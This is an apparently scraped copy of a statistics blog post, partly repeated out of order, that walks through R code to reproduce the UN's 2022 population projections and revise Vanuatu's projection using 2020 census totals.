#'   Only the total net migration proportion can change over time, not its age
#'   make-up.
#' @author Peter Ellis, expanding on a less-featured example by Farid Flici
#'   https://farid-flici.github.io/tuto.html
pop_proj <- function(start_pop_m, 
                     start_pop_f, 
                     start_year, 
                     end_year, 
                     fertility, 
                     mort_m,
                     mort_f,
                     sex_ratio_birth = rep(1.045, end_year - start_year + 1),
                     net_migration = rep(0, end_year - start_year + 1),
                     female_share_migration = rep(0.5, end_year - start_year + 1),
                     migration_age_weights = dnorm(0:120, mean = 28, sd = 11)
                     ){
  
  stopifnot(nrow(fertility) == 35)
  stopifnot(length(migration_age_weights) == 121)
  
  ncols <- end_year - start_year + 1
  
  stopifnot(ncol(fertility) == ncols)
  stopifnot(ncol(mort_m) == ncols)
  stopifnot(ncol(mort_f) == ncols)
  stopifnot(length(start_pop_m) > 50)
  stopifnot(length(start_pop_m) < 120)
  stopifnot(length(start_pop_f) > 50)
  stopifnot(length(start_pop_f) < 120)
  stopifnot(length(net_migration) == ncols)
  stopifnot(length(sex_ratio_birth) == ncols)
  stopifnot(length(female_share_migration) == ncols)
  stopifnot(min(female_share_migration) >= 0)
  stopifnot(max(female_share_migration) <= 1)
  
  stopifnot(nrow(mort_m) == nrow(mort_f))
  
  # fill in with high probability of death for ages beyond where we have mortality data
  if(nrow(mort_m) < 121){
    extra_deaths_m <- matrix(max(mort_m), nrow = 121 - nrow(mort_m), ncol = ncol(mort_m))
    extra_deaths_f <- matrix(max(mort_f), nrow = 121 - nrow(mort_f), ncol = ncol(mort_f))
    
    mort_m <- rbind(mort_m, extra_deaths_m)
    mort_f <- rbind(mort_f, extra_deaths_f)
  }
  
  # Create matrices for male and female population for the full projections
  # each row of the matrix is an age group, each column is a year
  PopM <- matrix(0, nrow=121, ncol = ncols)
  PopF <- matrix(0, nrow=121, ncol = ncols)
  deaths <- rep(NA, ncols)
  
  rownames(PopF) <- rownames(PopM) <- c(0:120)                # ages
  colnames(PopF) <- colnames(PopM) <- c(start_year:end_year)  # years
  
  # first year gets populated with the actual population numbers that we have:
  PopM[1:length(start_pop_m), 1] <- start_pop_m
  PopF[1:length(start_pop_f), 1] <- start_pop_f
  
  # subsequent years get modified by people aging one year, deaths, births, and net migration
  for (i in 2 : ncols) {
    
    # Age one and above:
    PopM[2:121, i] <- PopM[1:120, i-1] * (1 - mort_m[1:120, i-1])
    PopF[2:121, i] <- PopF[1:120, i-1] * (1 - mort_f[1:120, i-1])
    
    deaths[i-1] <- sum(PopM[, i-1]) - sum(PopM[, i]) + sum(PopF[, i-1]) - sum(PopF[, i])
    
    
    # migration. 
    total_migrants <- (sum(PopM[,i]) + sum(PopF[,i])) * net_migration[i]
    migf = total_migrants * female_share_migration[i] * migration_age_weights / sum(migration_age_weights)
    migm = total_migrants * (1 - female_share_migration[i]) * migration_age_weights / sum(migration_age_weights)
    
    PopM[, i] <- PopM[, i] + migm
    PopF[, i] <- PopF[, i] + migf
    
    
    # Age zero ie births. Fertility rate by the number of women in the middle of the previous year.
    # Note that PopF rows 16:50 equates to women age 15:49
    reproducing_women <- (PopF[16:50, i-1] + PopF[16:50, i]) / 2
    
    prop_boys <- sex_ratio_birth[i] / (1 + sex_ratio_birth[i])          
    prop_girls <- 1 - prop_boys
    
    PopM[1, i] <-  reproducing_women %*% fertility[, i-1] * prop_boys
    
    PopF[1, i] <- reproducing_women %*% fertility[, i-1] * prop_girls 

  }
  
  # Return a list of the two matrices
  return(list(
    PopM = PopM,
    PopF = PopF,
    deaths = deaths
  ))
}

Next, I wrote a function to extract the necessary fertility, mortality, migration rates and 2020 starting population from the UN data, feed it into my pop_proj() function and return the result. Unlike pop_proj(), which is to some degree fully portable, this function is very much specific to this particular project and is really just a convenience function for grabbing the data and turning it into the right units and shapes (vectors and matrices) needed for pop_proj().

repeat_un_proj <- function(the_country, the_years = 2020:2100){
  
  if(!the_country %in% unique(indicators$Location)){
    stop("Country not found")
  }
  
  this_fert <- fert_all |>
    filter(Location == the_country & Variant == "Medium") |>
    filter(Time %in% the_years) |>
    # Age-Specific Fertility rate
    select(Time, AgeGrp, ASFR) |>
    mutate(Time = as.character(Time),
           # turn into proportions, not rates per 1000:
           ASFR = ASFR / 1000) |>
    pivot_wider(id_cols = AgeGrp, names_from = Time, values_from = ASFR) |>
    arrange(AgeGrp) |>
    select(-AgeGrp) |>
    as.matrix()
  
  # should be 35 rows ie fertilities for ages 15 to 49
  stopifnot(nrow(this_fert) == 35)
  # should be 81 columns, 1 column for each year from 2020 to 2100
  stopifnot(ncol(this_fert) == length(the_years))
  
  
  # Mortality is in numbers not a ratio so we need to join to the population data to turn it into a ratio
  pop_years <- pop_all |>
    filter(Location == the_country & Variant == "Medium" & Time %in% the_years) |>
    select(Time, PopMale, PopFemale, AgeGrp)

  this_mort <- mort_all |>
    filter(Location == the_country & Variant == "Medium") |>
    filter(Time %in% the_years) |>
    left_join(pop_years, by = c("Time", "AgeGrp")) |>
    # next step important because we will be sorting by AgeGrp
    mutate(AgeGrp = case_when(
      AgeGrp == "100+" ~ 100,
      TRUE ~ suppressWarnings(as.numeric(as.character(AgeGrp)))
    ))
  
    
    
  this_mort_m <- this_mort |>
    # sometimes more deaths than people (eg 1 death, 0 people) so cap the death ratio at 1
    mutate(DeathMale = pmin(1, DeathMale / PopMale)) |>
    select(Time, AgeGrp, DeathMale) |>
    mutate(Time = as.character(Time)) |>
    pivot_wider(id_cols = AgeGrp, names_from = Time, values_from = DeathMale) |>
    arrange(AgeGrp) |>
    select(-AgeGrp) |>
    as.matrix()
  
  this_mort_f <- this_mort |>
    mutate(DeathFemale = pmin(1, DeathFemale / PopFemale)) |>
    select(Time, AgeGrp, DeathFemale) |>
    mutate(Time = as.character(Time)) |>
    pivot_wider(id_cols = AgeGrp, names_from = Time, values_from = DeathFemale) |>
    arrange(AgeGrp) |>
    select(-AgeGrp) |>
    as.matrix()
  
  # check the years are correct, didn't get mangled or reordered
  stopifnot(all(colnames(this_mort_f) == the_years))
  stopifnot(all(colnames(this_mort_m) == the_years))
  
  this_pop <- pop_all |>
    filter(Location == the_country & Variant == "Medium") |>
    filter(Time == min(the_years)) |>
    # next step important because we will be sorting by AgeGrp
    mutate(AgeGrp = case_when(
      AgeGrp == "100+" ~ 100,
      TRUE ~ suppressWarnings(as.numeric(as.character(AgeGrp)))
    )) |>
    arrange(AgeGrp) 
  
  # convert to units, not thousands of people:
  this_pop_m <- this_pop$PopMale * 1000
  this_pop_f <- this_pop$PopFemale * 1000
  
  # reality check
  # Population in millions; should be about 0.3 if the_country is Vanuatu, about 1400 if India:
  (sum(this_pop_m) + sum(this_pop_f) ) / 1e6
  
  # net migration
  this_cnmr <- indicators |>
    filter(Location == the_country & Time %in% the_years) |>
    arrange(Time) |>
    pull(CNMR) / 1000
  
  # sex ratio at birth
  this_srb <- indicators |>
    filter(Location == the_country & Time %in% the_years) |>
    arrange(Time) |>
    pull(SRB) / 100
  
  this_proj <- pop_proj(
                  start_pop_m = this_pop_m, 
                  start_pop_f = this_pop_f, 
                  start_year = min(the_years), 
                  end_year = max(the_years), 
                  fertility = this_fert, 
                  mort_m = this_mort_m,
                  mort_f = this_mort_f,
                  net_migration = this_cnmr,
                  sex_ratio_birth = this_srb
    
  )
  return(list(un_proj = this_proj,
         un_pop_m = this_pop_m,
         un_pop_f = this_pop_f,
         un_fert = this_fert,
         un_mort_m = this_mort_m,
         un_mort_f = this_mort_f,
         un_cnmr = this_cnmr,
         un_srb = this_srb))
}

Note that this function returns, in addition to the results of the population projection, the various inputs in their correct units and shape. This will be useful later when we want to modify some of those inputs.

Now that we’ve got these functions, using them to do projections from 2020 and compare those projections to the published numbers is pretty straight forward. Here’s the code to do that for Vanuatu, which produces the first chart at the top of this blog post:

the_country <- "Vanuatu"
my_proj <- repeat_un_proj(the_country)$un_proj

# total population
comp_data <- indicators |>
  filter(Location == the_country & Variant == "Medium" & Time %in% 2020:2100) |>
  select(Time, `UN original` = TPopulation1Jan) |>
  mutate(`Reproduction` = as.numeric(apply(my_proj$PopM, 2, sum) + apply(my_proj$PopF, 2, sum)) / 1000) 

# First year should be an exact match:
stopifnot(comp_data[1, ]$`UN original` == comp_data[1, ]$Reproduction)


comp_data |>
  gather(variable, value, -Time) |>
  ggplot(aes(x = Time, y = value, colour = variable)) +
  geom_line() +
  scale_y_continuous(label = comma) +
  labs(title = the_country,
       subtitle = "Attempt to re-create the UN population projections from population in 2020, fertility and mortality rates",
       y = "Population", x = "", colour = "")

As we can see the results are pretty much identical. Let’s look at my projected births and deaths based on fertility and mortality rates, and compare them to the published projected numbers

# births
indicators |>
  filter(Location == the_country & Variant == "Medium" & Time %in% 2020:2100) |>
  select(Time, `UN original` = Births) |>
  mutate(Reproduction = as.numeric(my_proj$PopM[1,] + my_proj$PopF[1, ]) / 1000) |>
  gather(variable, value , -Time)  |>
  ggplot(aes(x = Time, y = value, colour = variable)) +
  geom_line() +
  labs(title = the_country,
       subtitle = "Attempt to re-create the UN population projections from population in 2020, fertility and mortality rates",
       y = "Births (thousands)", x = "", colour = "")

# deaths
indicators |>
  filter(Location == the_country & Variant == "Medium" & Time %in% 2020:2100) |>
  select(Time, `UN original` = Deaths) |>
  mutate(Reproduction = as.numeric(my_proj$deaths) / 1000) |>
  gather(variable, value , -Time)  |>
  ggplot(aes(x = Time, y = value, colour = variable)) +
  geom_line() +
  labs(title = the_country,
       subtitle = "Attempt to re-create the UN population projections from population in 2020, fertility and mortality rates",
       y = "Deaths (thousands)", x = "", colour = "")

I’m pretty happy with those. There’s definitely some discrepancies and a lag in the births which I suspect come down to how one treats populations of mothers - numbers on 1 January v 1 July, that sort of thing. But in the scheme of things these are very small.

Now, Vanuatu is relatively easy because the UN assumed net zero migration in the projection period. We can see this by comparing the net migration rates in their Indicators dataset for a few countries, with this code:

plot_mig <- function(the_country){
  p <- indicators |>
    filter(Location == the_country) |>
    ggplot(aes(x = Time, y = CNMR)) +
    geom_vline(xintercept = 2022, lty = 2, colour = "steelblue") +
    geom_hline(yintercept = 0, lty = 2, colour = "steelblue") +
    geom_line() +
    labs(title = the_country,
         subtitle = "Net migration rate per thousand people",
         y = "", x = "",
         caption = "Source: UN World Population Prospects 2022")
  
  return(p)
}

plot_mig("Vanuatu") + plot_mig("Fiji") + 
  plot_mig("Australia") + plot_mig("India") +
  plot_layout(ncol = 2)

For countries that have good data on it, migration is a big deal in the projections; but forecasting is hard, particularly of the future.

My first few goes at reproducing the projections for Australia and India tended to be badly out because I had added in net migration evenly across the whole age distribution. My eventual solution, making net migration bell curved with an average age of 28, is a bit of a hack with the parameters chosen to make Australia’s projections come out right. Definitely a better method would be to have actual age-specific net migration forecasts. Whether such things are possible will very much depend on the country; it’s probably possible for Australia, but not for most of the countries I work with.

Here’s the final result comparing UN projections with mine for a few interesting countries:

Adjusting the starting point

Now, the whole point of this exercise was to see if we can plausibly adjust the starting point - say the population totals in 2020, or the forecast fertility rates - and say we are building on the UN’s projections to get our own. Here’s my rough demo of how we might do that, again using the case of Vanuatu. Vanuatu’s 2020 census wasn’t available at the time of the UN’s 2022 population projections, so the actual population and fertility numbers for 2020 differ somewhat (of course) from what was projected.

For the below, I am relying on the analytical report of the Vanuatu census. On a quick glance I didn’t see a table of the actual total population by single year age and sex, so I just adjusted the UN’s projected totals by a factor to make them add up to the correct 2020 total males and females. Of course if we were doing this for real we’d get the real numbers straight from the census; I actually can do this easily enough at work but obviously for this blog wanted to use only easily accessible public data.

#-----------------changing one or two factors while keeping the rest the same--------------

# Say we had the 2020 Vanuatu census so we knew the real population then, and wanted
# to redo the population projections with everything staying as they were before


# file:///C:/Users/Peter/Downloads/Vanuatu_2020_Census_Analytical_report_Vol_2.pdf
revision_country <- "Vanuatu"
van_orig <- repeat_un_proj(revision_country)

# rough adjustment of starting population in 2020 to make totals match the Census totals.
# In principle could of course use the actual numbers by single age category.
revised_pop_m <- van_orig$un_pop_m * 151597 / sum(van_orig$un_pop_m)
revised_pop_f <- van_orig$un_pop_f * 148422 / sum(van_orig$un_pop_f)

# calculate the crude birth rate in the current projection
un_cbr_2020 <- (van_orig$un_proj$PopM[1, 2]  + van_orig$un_proj$PopF[1, 2]) / 
  sum(van_orig$un_proj$PopM[, 2], van_orig$un_proj$PopF[, 2]) * 1000

# make a rough adjustment of future fertility rates assuming they are "out" by the
# same proportion that crude birth rate was out in 2020
adj_ratio <- 28.2 / un_cbr_2020
revised_fert <- van_orig$un_fert * adj_ratio

# Refit the projection with the above rough adjustments:
revised_proj <- pop_proj(
  start_pop_m = revised_pop_m,
  start_pop_f = revised_pop_f,
  start_year = 2020,
  end_year = 2100,
  fertility = revised_fert,
  mort_m = van_orig$un_mort_m,
  mort_f = van_orig$un_mort_f,
  sex_ratio_birth = van_orig$un_srb,
  net_migration = van_orig$un_cnmr)


projected_pop <- apply(revised_proj$PopM, 2, sum) + apply(revised_proj$PopF, 2, sum)

#-----------------Compare total population----------------
comp_data <- indicators |>
  filter(Location == revision_country & Variant == "Medium" & Time %in% 2020:2100) |>
  select(Time, `2022 UN projections` = TPopulation1Jan) |>
  mutate(`Revised with 2020 census` = as.numeric(projected_pop / 1000) )


p5 <- comp_data |>
  filter(Time <= 2050) |>
  gather(variable, value, -Time) |>
  ggplot(aes(x = Time, y = value, colour = variable)) +
  geom_line() +
  labs(title = revision_country,
       subtitle = "Attempt to re-create the UN population projections from population in 2020, fertility and mortality rates",
       y = "Population", x = "", colour = "")

#--------------Compare population pyramids-------------------------
d <- tibble(value = c( revised_proj$PopM[, 31], revised_proj$PopF[, 31],   
                  van_orig$un_proj$PopM[, 31],  van_orig$un_proj$PopF[, 31]),
       sex = rep(c("Male", "Female", "Male", "Female"), each = 121),
       model = rep(c("Revised projections with 2020 census, made in 2024", "UN projections, made in 2022"), each = 242),
       age = rep(0:120, 4)) |>
  mutate(agef = fct_reorder(as.character(age), age),
         model = fct_rev(model)) |>
  filter(age < 100)

d |>
  filter(sex == "Female") |>
  ggplot(aes(x = value, y = agef)) +
  facet_wrap(~model) +
  geom_col(fill = "brown", colour = NA) +
  geom_col(data = filter(d, sex == "Male"), aes(x = -value), fill = "orange", colour = NA) +
  geom_vline(xintercept = 0, colour = "white") +
  labs(x = "Number of people", y = "",
       title = "Comparison of UN original and revised population projections",
       subtitle = "Population age distribution in 2050") +
  scale_x_continuous(breaks = c(-4000, -2000, 0, 2000, 4000), labels = c("4,000", "Male", 0, "Female", "4,000")) +
  theme(panel.grid = element_blank()) +
  scale_y_discrete(breaks = 1:20 * 5)

And that’s what gets us these results:

I’m hoping this might be actually useful for pragmatic updates of the UN population projections when more current data is available, without having to revise everything from scratch.

OK, that’s all for today.

To leave a comment for the author, please follow the link and comment on their blog: free range statistics - R.

R-bloggers.com offers daily e-mail updates about R news and tutorials about learning R and many other topics. Click here if you're looking to post or find an R/data-science job.

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

Continue reading: Reproducing and adapting the UN Population Projections by @ellis2013nz

Reproducing and adapting the UN Population Projections by @ellis2013nz

free range statistics - R — Sun, 05 May 2024 00:00:00 +0000

[This article was first published on free range statistics - R, and kindly contributed to R-bloggers]. (You can report issue about the content on this page here)

Want to share your content on R-bloggers? click here if you have a blog, or here if you don't.

And here’s the same method tweaked for the actual 2020 census total and with a rough adjustment made to fertility rates based on what was observed at the 2020 census:

Reproducing UN projections

So here’s how I went about that.

library(tidyverse)
library(glue)
library(scales)
library(patchwork)

dir.create("data-pop-proj-2022", showWarnings = FALSE)

#------------------download and import data for all countries from existing projections----------------
list.files("data-pop-proj-2022")

files <- c("WPP2022_Fertility_by_Age1.zip",
           "WPP2022_DeathsBySingleAgeSex_Medium_1950-2021.zip",
           "WPP2022_DeathsBySingleAgeSex_Medium_2022-2100.zip",
           "WPP2022_Population1JanuaryBySingleAgeSex_Medium_1950-2021.zip",
           "WPP2022_Population1JanuaryBySingleAgeSex_Medium_2022-2100.zip",
           "WPP2022_Demographic_Indicators_Medium.zip"
           )

# let downloads take up to 10 minutes rather than 1 minute max, as files are
# large (largest is fertility for single age, 78MB)
options(timeout=600)

if(!file.exists("data-pop-proj-2022/WPP2022_Demographic_Indicators_Medium.csv")){
  # download the zip files:
  for(i in 1:length(files)){
    download.file(glue("https://population.un.org/wpp/Download/Files/1_Indicators%20(Standard)/CSV_FILES/{files[i]}"),
                   destfile = glue("data-pop-proj-2022/{files[i]}"), mode = "wb")
  }
  
  # unzip them
  for(i in 1:length(files)){
    unzip(glue("data-pop-proj-2022/{files[i]}"), exdir = "data-pop-proj-2022")
  }
}

fert_all    <- read_csv("data-pop-proj-2022/WPP2022_Fertility_by_Age1.csv")
mort_past   <- read_csv("data-pop-proj-2022/WPP2022_DeathsBySingleAgeSex_Medium_1950-2021.csv")
mort_future <- read_csv("data-pop-proj-2022/WPP2022_DeathsBySingleAgeSex_Medium_2022-2100.csv")
pop_past    <- read_csv("data-pop-proj-2022/WPP2022_Population1JanuaryBySingleAgeSex_Medium_1950-2021.csv")
pop_future  <- read_csv("data-pop-proj-2022/WPP2022_Population1JanuaryBySingleAgeSex_Medium_2022-2100.csv")
indicators  <- read_csv("data-pop-proj-2022/WPP2022_Demographic_Indicators_Medium.csv")

mort_all <- rbind(mort_past, mort_future)
pop_all <- rbind(pop_past, pop_future)

# clean up
rm(mort_past, mort_future, pop_past, pop_future)

My observation is that demographers seem to think in terms of matrices of numbers rather than database-oriented tidy data, and I have kept that matrix approach in this function.

#----------------------projections for one country-------------------

# adapting the implementation of the method for cohort component projection at 
# https://farid-flici.github.io/tuto.html


#' @param start_pop_m is a vector of population of males at single year age
#'   periods beginning of year starting age 0
#' @param start_pop_f as start_pop_m but for females
#' @param start_year first year ie the year for which the actual population
#'   number refers to
#' @param end_year end year for the population projection
#' @param fertility a matrix with rows for female agegroups 15 to 49 and a
#'   column for each year, values are births per woman (not per thousand women)
#'   that year and age. Must have 35 rows and number of columns equal to
#'   end_year minus start_year plus one.
#' @param mort_m a matrix with rows for age 0 to at least 50 and columns for
#'   each year, for males. Must have number of columns equal to end_year minus
#'   start_year plus one.
#' @param mort_f as mort_m but for females. Must have same number of rows and
#'   columns as mort_m.
#' @param sex_ratio_birth number of boys born for every girl born, vector with
#'   length of years to be projected.
#' @param net_migration vector of proportions of the population that migrate to
#'   the country, net of those who leave. Defaults to a vector of zeroes.
#' @param female_share_migration vector of proportions of net migrants that are
#'   female. Defaults to a vector of 0.5s.
#' @param migration_age_weights vector of relative distribution of the age of
#'   net migrants. Must be 121 values representing relative proportion of net
#'   migrants aged zero to 120. Defaults to a normal distribution of mean 28 and
#'   standard deviation 11. Note that this distribution currently must be the
#'   same through the projection period (unlike eg fertility and mortality,
#'   which have individual values for each age group and sex for each year).
#'   Only the total net migration proportion can change over time, not its age
#'   make-up.
#' @author Peter Ellis, expanding on a less-featured example by Farid Flici
#'   https://farid-flici.github.io/tuto.html
pop_proj <- function(start_pop_m, 
                     start_pop_f, 
                     start_year, 
                     end_year, 
                     fertility, 
                     mort_m,
                     mort_f,
                     sex_ratio_birth = rep(1.045, end_year - start_year + 1),
                     net_migration = rep(0, end_year - start_year + 1),
                     female_share_migration = rep(0.5, end_year - start_year + 1),
                     migration_age_weights = dnorm(0:120, mean = 28, sd = 11)
                     ){
  
  stopifnot(nrow(fertility) == 35)
  stopifnot(length(migration_age_weights) == 121)
  
  ncols <- end_year - start_year + 1
  
  stopifnot(ncol(fertility) == ncols)
  stopifnot(ncol(mort_m) == ncols)
  stopifnot(ncol(mort_f) == ncols)
  stopifnot(length(start_pop_m) > 50)
  stopifnot(length(start_pop_m) < 120)
  stopifnot(length(start_pop_f) > 50)
  stopifnot(length(start_pop_f) < 120)
  stopifnot(length(net_migration) == ncols)
  stopifnot(length(sex_ratio_birth) == ncols)
  stopifnot(length(female_share_migration) == ncols)
  stopifnot(min(female_share_migration) >= 0)
  stopifnot(max(female_share_migration) <= 1)
  
  stopifnot(nrow(mort_m) == nrow(mort_f))
  
  # fill in with high probability of death for ages beyond where we have mortality data
  if(nrow(mort_m) < 121){
    extra_deaths_m <- matrix(max(mort_m), nrow = 121 - nrow(mort_m), ncol = ncol(mort_m))
    extra_deaths_f <- matrix(max(mort_f), nrow = 121 - nrow(mort_f), ncol = ncol(mort_f))
    
    mort_m <- rbind(mort_m, extra_deaths_m)
    mort_f <- rbind(mort_f, extra_deaths_f)
  }
  
  # Create matrices for male and female population for the full projections
  # each row of the matrix is an age group, each column is a year
  PopM <- matrix(0, nrow=121, ncol = ncols)
  PopF <- matrix(0, nrow=121, ncol = ncols)
  deaths <- rep(NA, ncols)
  
  rownames(PopF) <- rownames(PopM) <- c(0:120)                # ages
  colnames(PopF) <- colnames(PopM) <- c(start_year:end_year)  # years
  
  # first year gets populated with the actual population numbers that we have:
  PopM[1:length(start_pop_m), 1] <- start_pop_m
  PopF[1:length(start_pop_f), 1] <- start_pop_f
  
  # subsequent years get modified by people aging one year, deaths, births, and net migration
  for (i in 2 : ncols) {
    
    # Age one and above:
    PopM[2:121, i] <- PopM[1:120, i-1] * (1 - mort_m[1:120, i-1])
    PopF[2:121, i] <- PopF[1:120, i-1] * (1 - mort_f[1:120, i-1])
    
    deaths[i-1] <- sum(PopM[, i-1]) - sum(PopM[, i]) + sum(PopF[, i-1]) - sum(PopF[, i])
    
    
    # migration. 
    total_migrants <- (sum(PopM[,i]) + sum(PopF[,i])) * net_migration[i]
    migf = total_migrants * female_share_migration[i] * migration_age_weights / sum(migration_age_weights)
    migm = total_migrants * (1 - female_share_migration[i]) * migration_age_weights / sum(migration_age_weights)
    
    PopM[, i] <- PopM[, i] + migm
    PopF[, i] <- PopF[, i] + migf
    
    
    # Age zero ie births. Fertility rate by the number of women in the middle of the previous year.
    # Note that PopF rows 16:50 equates to women age 15:49
    reproducing_women <- (PopF[16:50, i-1] + PopF[16:50, i]) / 2
    
    prop_boys <- sex_ratio_birth[i] / (1 + sex_ratio_birth[i])          
    prop_girls <- 1 - prop_boys
    
    PopM[1, i] <-  reproducing_women %*% fertility[, i-1] * prop_boys
    
    PopF[1, i] <- reproducing_women %*% fertility[, i-1] * prop_girls 

  }
  
  # Return a list of the two matrices
  return(list(
    PopM = PopM,
    PopF = PopF,
    deaths = deaths
  ))
}

repeat_un_proj <- function(the_country, the_years = 2020:2100){
  
  if(!the_country %in% unique(indicators$Location)){
    stop("Country not found")
  }
  
  this_fert <- fert_all |>
    filter(Location == the_country & Variant == "Medium") |>
    filter(Time %in% the_years) |>
    # Age-Specific Fertility rate
    select(Time, AgeGrp, ASFR) |>
    mutate(Time = as.character(Time),
           # turn into proportions, not rates per 1000:
           ASFR = ASFR / 1000) |>
    pivot_wider(id_cols = AgeGrp, names_from = Time, values_from = ASFR) |>
    arrange(AgeGrp) |>
    select(-AgeGrp) |>
    as.matrix()
  
  # should be 35 rows ie fertilities for ages 15 to 49
  stopifnot(nrow(this_fert) == 35)
  # should be 81 columns, 1 column for each year from 2020 to 2100
  stopifnot(ncol(this_fert) == length(the_years))
  
  
  # Mortality is in numbers not a ratio so we need to join to the population data to turn it into a ratio
  pop_years <- pop_all |>
    filter(Location == the_country & Variant == "Medium" & Time %in% the_years) |>
    select(Time, PopMale, PopFemale, AgeGrp)

  this_mort <- mort_all |>
    filter(Location == the_country & Variant == "Medium") |>
    filter(Time %in% the_years) |>
    left_join(pop_years, by = c("Time", "AgeGrp")) |>
    # next step important because we will be sorting by AgeGrp
    mutate(AgeGrp = case_when(
      AgeGrp == "100+" ~ 100,
      TRUE ~ suppressWarnings(as.numeric(as.character(AgeGrp)))
    ))
  
    
    
  this_mort_m <- this_mort |>
    # sometimes more deaths than people (eg 1 death, 0 people) so cap the death ratio at 1
    mutate(DeathMale = pmin(1, DeathMale / PopMale)) |>
    select(Time, AgeGrp, DeathMale) |>
    mutate(Time = as.character(Time)) |>
    pivot_wider(id_cols = AgeGrp, names_from = Time, values_from = DeathMale) |>
    arrange(AgeGrp) |>
    select(-AgeGrp) |>
    as.matrix()
  
  this_mort_f <- this_mort |>
    mutate(DeathFemale = pmin(1, DeathFemale / PopFemale)) |>
    select(Time, AgeGrp, DeathFemale) |>
    mutate(Time = as.character(Time)) |>
    pivot_wider(id_cols = AgeGrp, names_from = Time, values_from = DeathFemale) |>
    arrange(AgeGrp) |>
    select(-AgeGrp) |>
    as.matrix()
  
  # check the years are correct, didn't get mangled or reordered
  stopifnot(all(colnames(this_mort_f) == the_years))
  stopifnot(all(colnames(this_mort_m) == the_years))
  
  this_pop <- pop_all |>
    filter(Location == the_country & Variant == "Medium") |>
    filter(Time == min(the_years)) |>
    # next step important because we will be sorting by AgeGrp
    mutate(AgeGrp = case_when(
      AgeGrp == "100+" ~ 100,
      TRUE ~ suppressWarnings(as.numeric(as.character(AgeGrp)))
    )) |>
    arrange(AgeGrp) 
  
  # convert to units, not thousands of people:
  this_pop_m <- this_pop$PopMale * 1000
  this_pop_f <- this_pop$PopFemale * 1000
  
  # reality check
  # Population in millions; should be about 0.3 if the_country is Vanuatu, about 1400 if India:
  (sum(this_pop_m) + sum(this_pop_f) ) / 1e6
  
  # net migration
  this_cnmr <- indicators |>
    filter(Location == the_country & Time %in% the_years) |>
    arrange(Time) |>
    pull(CNMR) / 1000
  
  # sex ratio at birth
  this_srb <- indicators |>
    filter(Location == the_country & Time %in% the_years) |>
    arrange(Time) |>
    pull(SRB) / 100
  
  this_proj <- pop_proj(
                  start_pop_m = this_pop_m, 
                  start_pop_f = this_pop_f, 
                  start_year = min(the_years), 
                  end_year = max(the_years), 
                  fertility = this_fert, 
                  mort_m = this_mort_m,
                  mort_f = this_mort_f,
                  net_migration = this_cnmr,
                  sex_ratio_birth = this_srb
    
  )
  return(list(un_proj = this_proj,
         un_pop_m = this_pop_m,
         un_pop_f = this_pop_f,
         un_fert = this_fert,
         un_mort_m = this_mort_m,
         un_mort_f = this_mort_f,
         un_cnmr = this_cnmr,
         un_srb = this_srb))
}

the_country <- "Vanuatu"
my_proj <- repeat_un_proj(the_country)$un_proj

# total population
comp_data <- indicators |>
  filter(Location == the_country & Variant == "Medium" & Time %in% 2020:2100) |>
  select(Time, `UN original` = TPopulation1Jan) |>
  mutate(`Reproduction` = as.numeric(apply(my_proj$PopM, 2, sum) + apply(my_proj$PopF, 2, sum)) / 1000) 

# First year should be an exact match:
stopifnot(comp_data[1, ]$`UN original` == comp_data[1, ]$Reproduction)


comp_data |>
  gather(variable, value, -Time) |>
  ggplot(aes(x = Time, y = value, colour = variable)) +
  geom_line() +
  scale_y_continuous(label = comma) +
  labs(title = the_country,
       subtitle = "Attempt to re-create the UN population projections from population in 2020, fertility and mortality rates",
       y = "Population", x = "", colour = "")

As we can see the results are pretty much identical. Let’s look at my projected births and deaths based on fertility and mortality rates, and compare them to the published projected numbers

# births
indicators |>
  filter(Location == the_country & Variant == "Medium" & Time %in% 2020:2100) |>
  select(Time, `UN original` = Births) |>
  mutate(Reproduction = as.numeric(my_proj$PopM[1,] + my_proj$PopF[1, ]) / 1000) |>
  gather(variable, value , -Time)  |>
  ggplot(aes(x = Time, y = value, colour = variable)) +
  geom_line() +
  labs(title = the_country,
       subtitle = "Attempt to re-create the UN population projections from population in 2020, fertility and mortality rates",
       y = "Births (thousands)", x = "", colour = "")

# deaths
indicators |>
  filter(Location == the_country & Variant == "Medium" & Time %in% 2020:2100) |>
  select(Time, `UN original` = Deaths) |>
  mutate(Reproduction = as.numeric(my_proj$deaths) / 1000) |>
  gather(variable, value , -Time)  |>
  ggplot(aes(x = Time, y = value, colour = variable)) +
  geom_line() +
  labs(title = the_country,
       subtitle = "Attempt to re-create the UN population projections from population in 2020, fertility and mortality rates",
       y = "Deaths (thousands)", x = "", colour = "")

plot_mig <- function(the_country){
  p <- indicators |>
    filter(Location == the_country) |>
    ggplot(aes(x = Time, y = CNMR)) +
    geom_vline(xintercept = 2022, lty = 2, colour = "steelblue") +
    geom_hline(yintercept = 0, lty = 2, colour = "steelblue") +
    geom_line() +
    labs(title = the_country,
         subtitle = "Net migration rate per thousand people",
         y = "", x = "",
         caption = "Source: UN World Population Prospects 2022")
  
  return(p)
}

plot_mig("Vanuatu") + plot_mig("Fiji") + 
  plot_mig("Australia") + plot_mig("India") +
  plot_layout(ncol = 2)

For countries that have good data on it, migration is a big deal in the projections; but forecasting is hard, particularly of the future.

Here’s the final result comparing UN projections with mine for a few interesting countries:

Adjusting the starting point

#-----------------changing one or two factors while keeping the rest the same--------------

# Say we had the 2020 Vanuatu census so we knew the real population then, and wanted
# to redo the population projections with everything staying as they were before


# file:///C:/Users/Peter/Downloads/Vanuatu_2020_Census_Analytical_report_Vol_2.pdf
revision_country <- "Vanuatu"
van_orig <- repeat_un_proj(revision_country)

# rough adjustment of starting population in 2020 to make totals match the Census totals.
# In principle could of course use the actual numbers by single age category.
revised_pop_m <- van_orig$un_pop_m * 151597 / sum(van_orig$un_pop_m)
revised_pop_f <- van_orig$un_pop_f * 148422 / sum(van_orig$un_pop_f)

# calculate the crude birth rate in the current projection
un_cbr_2020 <- (van_orig$un_proj$PopM[1, 2]  + van_orig$un_proj$PopF[1, 2]) / 
  sum(van_orig$un_proj$PopM[, 2], van_orig$un_proj$PopF[, 2]) * 1000

# make a rough adjustment of future fertility rates assuming they are "out" by the
# same proportion that crude birth rate was out in 2020
adj_ratio <- 28.2 / un_cbr_2020
revised_fert <- van_orig$un_fert * adj_ratio

# Refit the projection with the above rough adjustments:
revised_proj <- pop_proj(
  start_pop_m = revised_pop_m,
  start_pop_f = revised_pop_f,
  start_year = 2020,
  end_year = 2100,
  fertility = revised_fert,
  mort_m = van_orig$un_mort_m,
  mort_f = van_orig$un_mort_f,
  sex_ratio_birth = van_orig$un_srb,
  net_migration = van_orig$un_cnmr)


